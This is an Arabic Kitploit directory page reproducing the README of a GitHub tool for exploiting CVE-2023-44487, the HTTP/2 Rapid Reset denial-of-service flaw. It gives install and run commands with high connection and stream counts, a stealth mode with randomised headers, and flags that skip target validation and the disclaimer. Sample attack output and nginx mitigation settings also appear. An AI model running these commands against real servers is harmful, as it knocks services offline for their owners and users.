Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit — Advanced CVE-2023-44487 HTTP/2 Rapid Reset vulnerability exploitation framework. Features multi-connection concurrent attacks, adaptive rate control, stealth mode with randomized headers, real-time metrics, and risk assessment reporting. For authorized penetration testing only. By Sudeepa Wanigarathna | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
Exploit FrameworksVulnerability AnalysisExploitationWeb SecurityPenetration TestingRed TeamingAdversarial Attack
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

Advanced CVE-2023-44487 HTTP/2 Rapid Reset vulnerability exploitation framework. Features multi-connection concurrent attacks, adaptive rate control, stealth mode with randomized headers, real-time metrics, and risk assessment reporting. For authorized penetration testing only. By Sudeepa Wanigarathna

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

عرض المستودع
1منذ 19 أياملم تتم المراجعة بعد
مشاركة

استغلال CVE-2023-44487 لرفض الخدمة HTTP/2 عبر إعادة الضبط السريع

الإصدار الاحترافي v1.0.1 | المؤلف: Sudeepa Wanigarathna

Python Version License Version CVSS


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الميزات
  • المتطلبات
  • التثبيت
  • بدء سريع
  • دليل الاستخدام
  • خيارات الإعداد
  • دعم Docker
  • أمثلة
  • فهم النتائج
  • التوصيات الأمنية
  • إخلاء المسؤولية القانوني
  • المؤلف
  • سجل التغييرات

نظرة عامة

إطار تقييم بمستوى احترافي لثغرة CVE-2023-44487، وهي ثغرة إعادة الضبط السريع في HTTP/2. تساعد هذه الأداة المتخصصين في الأمن السيبراني على اختبار الأنظمة والتحقق منها ضد أحد أكثر حالات رفض الخدمة HTTP/2 تأثيرًا التي تم الكشف عنها في السنوات الأخيرة.

توضح الأداة كيف يمكن للإنشاء السريع وإعادة الضبط لتدفقات HTTP/2 أن يستنزف موارد الخادم ويؤدي إلى حالات رفض الخدمة (DoS).

أبرز الميزات في لمحة

  • محرك هجوم متعدد الاتصالات — اتصالات HTTP/2 متزامنة
  • تحكم تكيفي في المعدل — ضبط ديناميكي لتحقيق أقصى فعالية
  • وضع التخفي — ترويسات عشوائية وتدوير الاتصالات
  • تقارير شاملة — JSON/CSV مع تقييم المخاطر
  • دعم Docker — نشر عبر الحاويات
  • مراقبة فورية — مقاييس الهجوم والتقدم بشكل مباشر
  • تسجيل احترافي — مخرجات وحدة تحكم ملونة مع تسجيل في ملف
الاستخدامالنتائج

تفاصيل الثغرة

CVE-2023-44487: هجوم إعادة الضبط السريع HTTP/2

نظرة تقنية عامة

تستغل الثغرة آلية إدارة التدفقات في بروتوكول HTTP/2:

  1. إنشاء التدفق — يرسل العميل إطار HEADERS لإنشاء تدفق جديد
  2. إعادة ضبط فورية — يرسل العميل فورًا إطار RST_STREAM
  3. معالجة الخادم — يجب على الخادم معالجة كلا الإطارين، مما يستهلك الموارد
  4. استنزاف الموارد — الدورات المتكررة تُرهق موارد الخادم

التأثير

  • استنزاف الموارد على خوادم HTTP/2
  • رفض خدمة محتمل (DoS)
  • يمكن أن يؤثر على موازنات التحميل والخوادم الوسيطة وشبكات توصيل المحتوى (CDN)
  • لا يتطلب مصادقة أو صلاحيات خاصة

الميزات

الميزات الأساسية

إمكانيات متقدمة

  • دعم البروكسي — إعداد بروكسي قابل للتوسيع
  • تجميع الاتصالات — إدارة فعالة للاتصالات
  • استرداد الأخطاء — معالجة سلسة لفشل الاتصالات
  • ضبط الأداء — إعدادات قابلة للتخصيص لسيناريوهات مختلفة
  • التكامل مع CI/CD — مناسب لاختبارات الأمان الآلية

المتطلبات

متطلبات النظام

التبعيات

root@kitploit:~
h2>=4.1.0,<5.0.0
aiohttp>=3.8.0,<4.0.0

التثبيت

1. التثبيت السريع

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 cve-2023-44487-exploit.py --help

2. البيئة الافتراضية (موصى بها)

root@kitploit:~
# Create virtual environment
python3 -m venv venv

# Activate virtual environment
# On Linux/macOS:
source venv/bin/activate
# On Windows:
venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

3. التثبيت باستخدام Docker

root@kitploit:~
# Build Docker image
docker build -t cve-2023-44487-exploit .

# Run with Docker
docker run --rm cve-2023-44487-exploit target.com

4. التثبيت اليدوي

root@kitploit:~
# Install without requirements.txt
pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"

# Download the exploit
wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py

# Make executable
chmod +x cve-2023-44487-exploit.py

بدء سريع

الاستخدام الأساسي

root@kitploit:~
# Simple run with default settings
python3 cve-2023-44487-exploit.py example.com

# Test HTTPS on port 443
python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify

# Test HTTP on port 80
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

اختبار سريع (5 ثوانٍ)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

تقييم كامل (60 ثانية)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify

دليل الاستخدام

خيارات سطر الأوامر

إعداد الهدف

إعداد الهجوم

خيارات متقدمة

التقارير


خيارات الإعداد

استخدم خيارات سطر الأوامر أعلاه لضبط التزامن وحجم التدفقات والمدة والتقارير. يُفضَّل استخدام قيم أقل لـ -c / -s / -d في التحقق الأولي، ثم قم بزيادة الحجم فقط على الأنظمة المصرح لك باختبار ضغطها.


دعم Docker

بناء الصورة

root@kitploit:~
docker build -t cve-2023-44487-exploit .

تشغيل تقييم أساسي

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com

التشغيل بمعلمات مخصصة

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60

حفظ النتائج محليًا

root@kitploit:~
docker run --rm -v "$(pwd)/results:/app/results" \
  cve-2023-44487-exploit target.com -o /app/results/report.json

الوضع التفاعلي

root@kitploit:~
docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit

Docker Compose

root@kitploit:~
# Start with docker-compose
docker-compose up

# Run with a custom command
docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60

أمثلة

1. تقييم HTTPS أساسي

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30

2. تقييم HTTP (بدون SSL)

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30

3. تشغيل معملي عالي الأداء

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000

4. وضع التخفي

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60

5. اختبار تحقق سريع

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

6. إنشاء تقرير CSV

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv

7. تخطي التحقق

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30

8. اختبار إنتاجي مصرح به

root@kitploit:~
python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
  -c 100 -s 2000 -d 60 --stealth -o full_report.json

فهم النتائج

مقاييس المخرجات

مستويات تقييم المخاطر

نموذج الإخراج

root@kitploit:~
================================================================================
EXPLOIT EXECUTION SUMMARY
================================================================================
Target: target.com:443
Duration: 30.00s
Total Streams: 15,234
Successful Resets: 15,198
Reset Rate: 506.6/s
Success Rate: 99.76%
Connection Errors: 0
--------------------------------------------------------------------------------
RISK ASSESSMENT
--------------------------------------------------------------------------------
Risk Level: CRITICAL
Risk Score: 95/100
Factors:
  - Extremely high reset rate accepted
  - Very high success rate
================================================================================

التوصيات الأمنية

لمسؤولي الأنظمة

إجراءات فورية

  1. تطبيق التصحيحات الأمنية

    • التحديث إلى أحدث تطبيقات HTTP/2
    • تطبيق التصحيحات الأمنية الخاصة بالمورّد
    • تحديث موازنات التحميل والخوادم الوسيطة
  2. تطبيق الحد من المعدل

    root@kitploit:~
    # Nginx rate limiting example
    http {
        limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
        limit_req zone=http2 burst=20 nodelay;
    }
    
  3. حدود الاتصالات

    root@kitploit:~
    # Limit connections per client
    limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
    limit_conn conn_zone 10;
    

تحصين الإعدادات

الإعدادالتوصية
الحد الأقصى للتدفقات المتزامنةاضبطه على 100–200 لكل اتصال
معدل إعادة ضبط التدفقات

المراقبة

root@kitploit:~
# Monitor HTTP/2 connections
netstat -an | grep 443 | grep ESTABLISHED | wc -l

# Monitor reset-related log entries (example)
grep "RST_STREAM" /var/log/nginx/error.log | wc -l

إجراءات الأمان الموصى بها

  • الحد من المعدل — تنفيذ حدود تدفقات لكل عميل
  • خنق الاتصالات — الحد من الاتصالات لكل عنوان IP
  • حدود الموارد — ضبط قيم مهلة الاتصال
  • المراقبة — تفعيل التسجيل والتنبيهات للأنشطة غير الطبيعية
  • قواعد WAF — تنفيذ قواعد WAF خاصة بـ HTTP/2
  • إدارة التصحيحات — تحديثات أمنية منتظمة
  • الاستجابة للحوادث — امتلاك خطة لهجمات DoS

إخلاء المسؤولية القانوني

هام: اقرأ هذا بعناية قبل استخدام هذه الأداة

هذه الأداة مقدمة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط.

شروط الاستخدام

باستخدامك لهذه الأداة، فإنك تقر وتوافق على أن:

  1. لديك إذن كتابي صريح لاختبار النظام الهدف
  2. أنت تتفهم المخاطر والتأثير المحتمل لهذا التقييم
  3. ستمتثل لجميع القوانين واللوائح المعمول بها
  4. أنت تتحمل المسؤولية الكاملة عن أفعالك
  5. لن تستخدم هذه الأداة في أنشطة غير مصرح بها

الاستخدامات المحظورة

يجب عدم استخدام هذه الأداة في:

  • الاختبارات أو الهجمات غير المصرح بها
  • رفض الخدمة ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها
  • تعطيل أنظمة الإنتاج دون تصريح
  • التسبب في ضرر مالي
  • أي أنشطة غير قانونية

بيان المسؤولية

يقدم المؤلف والمساهمون هذه الأداة «كما هي» دون أي ضمان. استخدام هذه الأداة يكون على مسؤوليتك الخاصة. المؤلف غير مسؤول عن أي أضرار أو مشكلات قانونية ناتجة عن استخدام هذه الأداة.

قد ينتهك الاستخدام غير المصرح به لهذه الأداة قوانين تشمل على سبيل المثال لا الحصر:

  • قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) — الولايات المتحدة
  • قانون إساءة استخدام الحاسوب — المملكة المتحدة
  • اللائحة العامة لحماية البيانات (GDPR) — الاتحاد الأوروبي
  • القوانين المحلية والوطنية والدولية الأخرى ذات الصلة

المؤلف

Sudeepa Wanigarathna

  • باحث أمني ومختبر اختراق
  • متخصص في أمن التطبيقات وثغرات البروتوكولات
  • GitHub
  • LinkedIn

سجل التغييرات

الإصدار 1.0.1 (الحالي)

  • إصلاح خطأ السمة connection_attempts
  • تحسين التحقق من SSL/ALPN
  • إضافة معالجة المهلات
  • تعزيز استرداد الأخطاء
  • إضافة علامة --skip-validation
  • تحسين دعم Docker

الإصدار 1.0.0 (الأولي)

  • الإصدار الأولي للنسخة الاحترافية
  • محرك هجوم متعدد الاتصالات
  • تحكم تكيفي في المعدل
  • وضع التخفي
  • تقارير شاملة
  • دعم Docker

الترخيص

هذا المشروع مرخص بموجب رخصة MIT — راجع ملف LICENSE للحصول على التفاصيل.


شكر وتقدير

  • فريق بروتوكول HTTP/2
  • الباحثون الأمنيون الذين اكتشفوا CVE-2023-44487
  • مجتمع المصادر المفتوحة (مشروعا h2 وaiohttp)

المراجع

  • إدخال CVE-2023-44487 في NVD
  • تحليل هجوم إعادة الضبط السريع HTTP/2
  • مواصفات بروتوكول HTTP/2 (RFC 9113)
  • النشرة الأمنية لـ HTTP/2 في Nginx
  • دليل أمان HTTP/2 في Apache

الدعم

للمشكلات والأسئلة:

  • مشكلات GitHub: تقديم مشكلة
  • البريد الإلكتروني: [email protected]
  • جهة الاتصال الأمنية: إذا وجدت ثغرة في هذا المشروع، فيرجى الإبلاغ عنها بمسؤولية.

بطاقة مرجعية سريعة

root@kitploit:~
# Quick Commands

# Test HTTPS (skip cert verify)
python3 cve-2023-44487-exploit.py target.com --no-verify

# Test HTTP
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

# Quick test (5 seconds)
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5

# Full assessment
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth

# Skip validation
python3 cve-2023-44487-exploit.py target.com --skip-validation

# Docker
docker run --rm cve-2023-44487-exploit target.com

# Help
python3 cve-2023-44487-exploit.py --help

تذكير: احصل دائمًا على التصريح المناسب قبل اختبار أي نظام. استخدم هذه الأداة بمسؤولية وأخلاقية.


تتم الصيانة بواسطة Sudeepa Wanigarathna | آخر تحديث: أغسطس 2026

تنزيل الأداة
السمةالقيمة
معرّف CVECVE-2023-44487
درجة CVSS7.5 (مرتفع)
متجه الهجومالشبكة
تعقيد الهجوممنخفض
التأثيررفض الخدمة (استنزاف الموارد)
البروتوكولات المتأثرةHTTP/2
تاريخ الإفصاحأكتوبر 2023
الميزةالوصف
دعم HTTP/2تنفيذ كامل لبروتوكول HTTP/2 باستخدام مكتبة h2
اتصالات متعددةهجوم متزامن عبر اتصالات متعددة
SSL/TLSدعم HTTPS مع خيارات التحقق من الشهادات
تحكم تكيفي في المعدليضبط معدل الهجوم ديناميكيًا بناءً على استجابة الخادم
وضع التخفيترويسات عشوائية وتدوير الاتصالات
مراقبة فوريةعرض المقاييس مباشرة أثناء التشغيل
تقارير شاملةمخرجات JSON/CSV مع تقييم المخاطر
دعم Dockerنشر عبر الحاويات لسهولة الاختبار
المكوّنالحد الأدنىالموصى به
نظام التشغيلLinux / macOS / Windowsلينكس أو macOS
Python3.7+3.11+
المعالجنواتان4 أنوية أو أكثر
الذاكرة2GB4GB+
الشبكة100Mbps1Gbps+
الخيارالوصفالافتراضي
hostاسم المضيف الهدف أو عنوان IPمطلوب
-p, --portمنفذ الهدف443
--no-sslتعطيل SSL/TLSFalse
--no-verifyتخطي التحقق من SSLFalse
الخيارالوصفالافتراضي
-c, --connectionsعدد الاتصالات المتزامنة50
-s, --streamsالتدفقات لكل اتصال1000
-d, --durationالمدة بالثواني30
--max-streamsالحد الأقصى لإجمالي التدفقات100000
--delayالتأخير الأساسي بين العمليات0.0001s
الخيارالوصفالافتراضي
--adaptiveتحكم تكيفي في المعدلTrue
--target-rpsالطلبات المستهدفة في الثانية10000
--stealthوضع التخفي (ترويسات عشوائية)False
--skip-validationتخطي التحقق من الهدفFalse
--forceتخطي موجه إخلاء المسؤولية القانونيFalse
الخيارالوصفالافتراضي
-o, --outputاسم ملف الإخراجexploit_results.json
--formatصيغة الإخراج (json / csv / console)json
-v, --verboseتسجيل مفصّلFalse
السيناريوالخيارات المقترحة
اختبار مبدئي سريع-c 10 -s 100 -d 5
تقييم قياسي-c 50 -s 1000 -d 30
اختبار معملي بحمل مرتفع-c 100 -s 2000 -d 60 --stealth
شهادة غير موثوقة--no-verify
HTTP عادي-p 80 --no-ssl
المقياسالوصفالتفسير
إجمالي التدفقاتعدد التدفقات التي تم إنشاؤهاعدد أعلى = حمل أكبر تم توليده
عمليات إعادة الضبط الناجحةالتدفقات التي تمت إعادة ضبطها بنجاحعادة >90% على الأهداف الضعيفة
معدل إعادة الضبط (RPS)عمليات إعادة الضبط في الثانيةمعدل أعلى = حمل أكثر فعالية
معدل النجاحالنسبة المئوية لعمليات إعادة الضبط الناجحةغالبًا ما تشير نسبة >90% إلى قابلية الإصابة
أخطاء الاتصالالاتصالات الفاشلةمنخفض = اتصال مستقر
عمليات إعادة الضبط من الخادمعمليات إعادة ضبط بدأها الخادممرتفع = وجود إجراءات حماية
المستوىالدرجةالمعنى
حرج80–100الخادم شديد الضعف
مرتفع60–79الخادم عرضة للخطر، مع وجود بعض الحماية
متوسط40–59توجد بعض الحماية
منخفض0–39خادم محمي جيدًا
الحد إلى <100/ثانية لكل عميل
حد الاتصالاتبحد أقصى 50–100 اتصال لكل عنوان IP
قيم المهلةقلل مهلات الخمول
حدود حجم الطلباتحدد أحجام الترويسات والحمولة